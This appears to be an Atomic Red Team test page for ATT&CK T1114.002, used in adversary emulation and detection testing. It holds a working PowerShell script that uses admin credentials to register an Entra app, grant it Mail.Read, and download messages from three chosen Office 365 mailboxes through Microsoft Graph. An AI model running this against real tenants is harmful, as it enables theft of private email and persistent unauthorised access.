T1114.002
Email Collection: Remote Email Collection
Description from ATT&CK
Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as MailSniper can be used to automate searches for specific keywords.
Atomic Tests
Atomic Test #1 - Office365 - Remote Mail Collected
Create and register an entra application that downloads emails from a tenant's Office 365 mailboxes using the Microsoft Graph API app-only access. This can be used by an adversary to collect an organization's sensitive information.
Supported Platforms: office-365
auto_generated_guid: 36657d95-d9d6-4fbf-8a31-f4085607bafd
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Full username (including @domain) of Entra user w/ AppRoleassignment.ReadWrite.All and Application.ReadWrite.All Scope (eg, Global Administrator Role) and sign-in method is password | string | None |
| password | Entra user password | string | None |
| 1st_target_mailbox | office-365 target_email_address | string | None |
| 2nd_target_mailbox | office-365 target_email_address | string | None |
| 3rd_target_mailbox | office-365 target_email_address | string | None |
Attack Commands: Run with powershell!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ss = ConvertTo-SecureString "#{password}" -AsPlainText -Force
$cred = New-Object PSCredential -ArgumentList '#{username}', $ss
$param = @{
Credential = $cred
Force = $true
}
$null = Connect-AzAccount @param
$token = (Get-AzAccessToken -ResourceTypeName MSGraph -ErrorAction Stop).token
$cert = New-SelfSignedCertificate -Subject "CN=PowerShell Application" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable -KeySpec Signature -KeyLength 2048 -KeyAlgorithm RSA -HashAlgorithm SHA256
$reqResourceAccess = ( @{ "resourceAccess" = (@{"id"= "570282fd-fa5c-430d-a7fd-fc8dc98a9dca"; "type"= "Scope"}, @{ "id"= "7427e0e9-2fba-42fe-b0c0-848c9e6a8182"; "type"= "Scope"}, @{"id"= "37f7f235-527c-4136-accd-4a02d197296e"; "type"= "Scope"}, @{"id"= "14dad69e-099b-42c9-810b-d002981feec1"; "type"= "Scope"}, @{ "id"= "e1fe6dd8-ba31-4d61-89e7-88639da4683d"; "type"= "Scope"}, @{ "id"= "810c84a8-4a9e-49e6-bf7d-12d183f40d01"; "type"= "Role"}); "resourceAppId" = "00000003-0000-0000-c000-000000000000" })
connect-mggraph -AccessToken $token
$context = Get-MgContext
$users = get-MgUser
$app = New-MgApplication -DisplayName "T1114.002 Atomic Test #1 - Office365 - Remote Email Collection" -RequiredResourceAccess $reqResourceAccess -Web @{ RedirectUris="http://localhost"; } -KeyCredentials @(@{ Type="AsymmetricX509Cert"; Usage="Verify"; Key=$cert.RawData })
New-MgServicePrincipal -AppId $app.appId -AdditionalProperties @{} | Out-Null
$resourceSPN = Get-MgServicePrincipal -Filter "AppId eq '$($app.AppId)'"
$graphApiApp = Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$mailRole = $graphApiApp.AppRoles|Where-Object Value -Eq "Mail.Read"
New-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $resourceSPN.Id -PrincipalId $resourceSPN.Id -ResourceId $graphApiApp.id -AppRoleId $mailRole.Id
$mailbox1 = "#{1st_target_mailbox}"
$mailbox2 = "#{2nd_target_mailbox}"
$mailbox3 = "#{3rd_target_mailbox}"
[System.Collections.ArrayList]$selectUsers = @()
foreach ($user in $users) {if (($user.Mail -eq $mailbox1) -Or ($user.Mail -eq $mailbox2) -Or ($user.Mail -eq $mailbox3)){$selectUsers.Add($user.id)}}
connect-mggraph -ClientId $app.AppId -TenantId $context.TenantId -CertificateName $cert.Subjectname.Name
foreach ($user in $selectUsers) { $url= "https://graph.microsoft.com/v1.0/users/$($user)/messages" ; Invoke-MgGraphRequest -Uri $url -Method GET -OutputType PSObject}
Cleanup Commands:
1
2
3
4
connect-mggraph -Scopes AppRoleAssignment.ReadWrite.All,Application.ReadWrite.All,User.Read -NoWelcome
Remove-MgApplication $app.AppId
Remove-Item -Path Cert:\CurrentUser\My\$($cert.thumbprint) -DeleteKey
Disconnect-MgGraph
Dependencies: Run with powershell!
Description: Microsoft Graph PowerShell SDK must be installed.
Check Prereq Commands:
1
2
$RequiredModule = Get-InstalledModule Microsoft.Graph
if (-not $RequiredModule) {exit 1} else {exit 0}
Get Prereq Commands:
1
Install-Module Microsoft.Graph -Scope CurrentUser
Description: Az.Accounts module must be installed.
Check Prereq Commands:
1
2
$RequiredModule2 = Get-InstalledModule Az.Accounts
if (-not $RequiredModule2) {exit 1} else {exit 0}
Get Prereq Commands:
1
Install-Module Az.Accounts -Scope CurrentUser